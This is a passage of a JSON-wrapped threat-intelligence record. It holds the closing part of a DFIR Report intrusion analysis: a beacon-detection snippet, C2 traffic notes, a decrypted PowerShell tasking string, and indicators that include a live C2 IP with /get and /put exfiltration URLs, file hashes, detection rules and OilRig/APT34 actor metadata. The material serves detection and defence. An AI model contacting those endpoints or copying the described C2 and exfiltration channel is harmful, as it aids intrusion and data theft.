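        for c in beacon_candidates(recs, ignore_server_errors=flag):
            print('  ', c['key'][2], c['hits'], 'hits, period', c['period_s'],
                  's, statuses', c['statuses'], 'first seen', c['first_seen'])
```
\r\nRun it with and without the 5xx filter: the /get beacon is flagged either way once enough hits accumulate, but with the filter its first_seen moves about a day later, after the server came up, which is exactly the window in which the implant was already running but had received no tasking yet. The single POST to /put is not periodic and is not flagged; it is the kind of request to hunt for by destination once the beacon has identified the host.\r\n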
All requests returned a 502 Bad Gateway error until day two, when the server came up and started returning tasking.\r\nFirst C2 communication breakdown:\r\nDecrypted example of an AES-encrypted PowerShell command received from the C2:\r\n0!@#EWQ654!@#EWQpowershell -command Get-Process^%$RTY:\r\nSafeBreach published similar findings from this C2 infrastructure, where they described the format in detail. You can review their research here.\r\nExfiltration\r\nSeveral files collected during discovery tasks, such as the domain account information, and later the keylogger data, were exfiltrated to the C2 server via POST requests over the same channel.\r\nImpact\r\nDuring the intrusion, no final actions beyond data collection and discovery tasks were observed.\r\nIndicators\r\nAtomic\r\n45.89.125.189\r\nhttp://45.89.125[.]189/get\r\nhttp://45.89.125[.]189/put\r\nComputed\r\nt.xml\r\nMD5: 691332c86dd568f87b7fff4601c37895\r\nSHA1: 0b676ea2ad205b70b9feb1eedbfdec72137e08e5\r\nSHA256: 7ae52c0562755f909d5d79c81bb99ee2403f2c2ee4d53fd1ba7692c8053a63f6\r\nreadkey.ps1\r\nMD5: fc5f490dbe375779b2c6bbccdd869ca6\r\nSHA1: b8c8171b6e8efd2bb0ae8d5b22749564edd38109\r\nSHA256: eb2a94ee29d902c8a13571ea472c80f05cfab8ba4ef80d92e333372f4c7191f4\r\nmodule.exe\r\nMD5: 9a7d5f126904adc194df4dcbc2c5715c\r\nSHA1: a86088cf31c72cc4648ee8dfa082979a74044203\r\nSHA256: b92be3d086372fc89b3466e8d9707de78a5b6dff3e4a2eecc92c01d55a86fd7d\r\nmodule.ahk\r\nMD5: c65b10c1113c0f0d4e06609fa60d9aad\r\nSHA1: 2ca263fc5f1e505c1839ab0abf56571af6c7809d\r\nSHA256: e4b2411286d32e6c6d3d7abffc70d296c814e837ef14f096c829bf07edd45180\r\nApply_Form.docm\r\nMD5: f769f67681707e8f69ecdf9e62fb944c\r\nSHA1: c5f6a48fa52a279e1f3424b97662b479716229af\r\nSHA256: 45f293b1b5a4aaec48ac943696302bac9c893867f1fc282e85ed8341dd2f0f50\r\nsc.ps1\r\nMD5: 34a2677a7776f87e810814c2d3845f47\r\nSHA1: 79b1f6b0afe943a60560eb20677d5b801dc29ba3\r\nSHA256: ac933ffc337d13b276e6034d26cdec836f03d90cb6ac7af6e11c045eeae8cc05\r\nlogFileuyovaqv.bin\r\nMD5: f7611e77c5f99b81085e61b17b969afe\r\nSHA1: 475320a5bf0ba52fc9ff711d8e6dba512b3fefbf\r\nSHA256: d4857156094963c8e38f6e88f4d72cb910aa537e3811eae0579f7abc568c9ae8\r\nUpdater.vbs\r\nMD5: 850b8d07180601417193a6f88227130a\r\nSHA1: e1f4a8e434638c56b7a0d2d0317f4d0d84987a40\r\nSHA256: be0e75d50565506baa1ce24301b702989ebe244b3a1d248ee5ea499ba812d698\r\ntemp.ps1\r\nMD5: c3aedb781a5b96674764cd43ef076d10\r\nSHA1: 86da0100bb6a07a89eaa4dc3ec220e9dbd6ecf71\r\nSHA256: 16007ea6ae7ce797451baec2132e30564a29ee0bf8a8f05828ad2289b3690f55\r\nScript.ps1\r\nMD5: a3c14604fb4454ba5722f07f89780e73\r\nSHA1: ed7b9ddbaee794cecb80fac794b0e6cb0ae073b5\r\nSHA256 (truncated in source): bda4484bb6325dfccaa464c2007a8f20130f0cf359a7f79e14feeab3f\r\nDetections\r\nNetwork\r\nET MALWARE TA452 Related Backdoor Activity (POST)\r\nET MALWARE TA452 Related Backdoor Activity (GET)\r\nET INFO Windows Powershell User-Agent Usage\r\nSigma\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rules/windows/process_creation/proc_creation_win_renamed_autohotkey_binary.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.ym\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/17333/17333.yar\r\nMITRE\r\nPowerShell – T1059.001\r\nMalicious File – T1204.002\r\nDomain Account – T1087.002\r\nSystem Information Discovery – T1082\r\nProcess Discovery – T1057\r\nSystem Owner/User Discovery – T1033\r\nSystem Network Connections Discovery – T1049\r\nScheduled Task/Job – T1053\r\nScreen Capture – T1113\r\nKeylogging – T1056.001\r\nSymmetric Cryptography – T1573.001\r\nArchive via Utility – T1560.001\r\nSecurity Software Discovery – T1518.001\r\nFile and Directory Discovery – T1083\r\nSystem Time Discovery – T1124\r\nSystem Service Discovery – T1007\r\nModify Registry – T1112\r\nInternal case #17333\r\nSource: https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\n",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/"
	],
	"report_names": [
		"collect-exfiltrate-sleep-repeat"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434767,
	"ts_updated_at": 1775792256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a.pdf",
		"text": "https://archive.orkl.eu/693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a.txt",
		"img": "https://archive.orkl.eu/693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a.jpg"
	}
}